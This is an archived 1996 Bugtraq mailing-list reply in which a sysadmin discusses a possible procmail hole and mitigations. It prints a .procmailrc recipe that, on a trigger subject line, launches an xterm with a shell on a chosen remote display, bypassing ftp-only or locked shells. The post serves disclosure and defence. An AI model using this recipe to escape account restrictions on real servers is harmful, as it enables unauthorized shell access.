[3070] in bugtraq
Re: procmail
daemon@ATHENA.MIT.EDU (Neil Soveran-Charley)
Tue Aug 6 18:14:19 1996
Date: Tue, 6 Aug 1996 22:30:46 +0100
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
From: Neil Soveran-Charley <athan@MERSINET.CO.UK>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
In-Reply-To: <199608060524.KAA01113@protocol.ece.iisc.ernet.in> from "DANIEL
.D .EZEKIEL" at Aug 6, 96 10:24:10 am
> hi there ,
> I just heard from a friend that there is a bug in procmail
> which allows anyone to open an xterm window from any
> m/c .has anyone heard of this if so can u post the details
> and the xploit
> thanx
> danny
>
NB: This isn't a 'hack an account' hole. However if you have
'ftponly' accounts, i.e. people grab email via pop, but also have ftp
access for maintaingin their web pages, with a 'shell' that prints a
message and exits, then the following is possible to work around such
security...
I think there may well be such an exploit. I'd guess it is simply
something like:
(.procmailrc contents)
:0 Hc
* ^Subject:.*APassword
/usr/bin/X11/xterm -display <some display> -e <a shell>
(end .procmailrc)
Then email yourself with something with the password in the subject
line and an xterm gets popped up on the display, running the given
shell, thus bypassing any 'locked account' or 'ftponly' shells...
I'm sure procmail MUST have some security feature to disallow this
sort of thing? But I could be wrong, and haven't checked the manual
pages yet.
For now I'm going to make procmail only executeable by a certain
group, and stick the 'admin' types in that.
Of course if you don't NEED X on the mail server, just delete it and
it removes THIS particular exploit. BUT I'd feel more comfortable with
making procmail only executeable by 'internal' accounts. The customer,
in our case, isn't PAYING for a shell account, and so shouldn't get ANY
of the facilites of one... Never mind the security issues...
-Neil
--
**************************************************************
* Neil Soveran-Charley, SysAdmin, Mersinet Internet Services *
* Email: athan@mersinet.co.uk * "What? No quote?" *
**************************************************************
